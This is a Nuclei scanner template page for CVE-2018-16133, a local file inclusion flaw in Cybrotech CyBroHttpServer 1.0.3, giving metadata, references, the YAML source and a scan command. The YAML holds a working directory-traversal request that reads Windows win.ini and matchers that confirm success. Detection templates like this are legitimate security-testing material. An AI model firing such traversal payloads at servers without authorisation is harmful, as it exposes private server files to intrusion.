Skip to content
Nuclei Templates

Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion

ID: CVE-2018-16133

Severity: medium

Author: 0x_Akoko

Tags: cve2018,cve,lfi,packetstorm,cybrotech

Description

Section titled “Description”

Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.

YAML Source

Section titled “YAML Source”
id: CVE-2018-16133


info:
  name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion
  author: 0x_Akoko
  severity: medium
  description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.
  reference:
    - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
    - http://www.cybrotech.com/
    - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16133
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2018-16133
    cwe-id: CWE-22
    epss-score: 0.03629
    epss-percentile: 0.91461
    cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cybrotech
    product: cybrohttpserver
  tags: cve2018,cve,lfi,packetstorm,cybrotech


http:
  - raw:
      - |+
        GET \..\..\..\..\Windows\win.ini HTTP/1.1
        Host: {{Hostname}}


    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a0046304402203e9d3b93ea4368eb64063b3c74014e701ba1ec32da22a5595b5fa9223cdd75dd022067fbfa170df4ceb7a1e4cb15f510a1c138b0d7e1e325ad51019241de8cf1a8b9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16133.yaml"

View on Github